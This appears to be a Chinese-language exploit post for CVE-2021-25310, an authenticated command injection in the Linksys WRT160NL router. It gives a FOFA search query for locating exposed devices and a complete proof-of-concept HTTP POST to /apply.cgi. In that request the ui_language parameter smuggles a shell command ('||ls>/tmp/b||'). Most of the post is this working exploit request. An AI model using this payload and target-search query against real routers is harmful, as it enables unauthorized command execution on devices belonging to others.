# CVE-2021-25310 Linksys WRT160NL 身份驗證命令注入漏洞
==FOFA==
app="LINKSYS-WRT160NL"
==POC==
POST /apply.cgi;session_id=8e780f3bcc71e19a37cc3e60a5576241 HTTP/1.1 Host: 192.168.1.150 User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:79.0) Gecko/20100101 Firefox/79.0 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,/;q=0.8 Accept-Language: es-ES,es;q=0.8,en-US;q=0.5,en;q=0.3 Accept-Encoding: gzip, deflate Content-Type: application/x-www-form-urlencoded Content-Length: 854 Origin: http://192.168.1.150 Connection: close Referer: http://192.168.1.150/index.asp;session_id=8e780f3bcc71e19a37cc3e60a5576241 Upgrade-Insecure-Requests: 1 pptp_dhcp=0&(...)&ui_language=es||ls>/tmp/b||&(...)
© 版权声明
文章版权归作者所有,未经允许请勿转载。
THE END













请登录后查看评论内容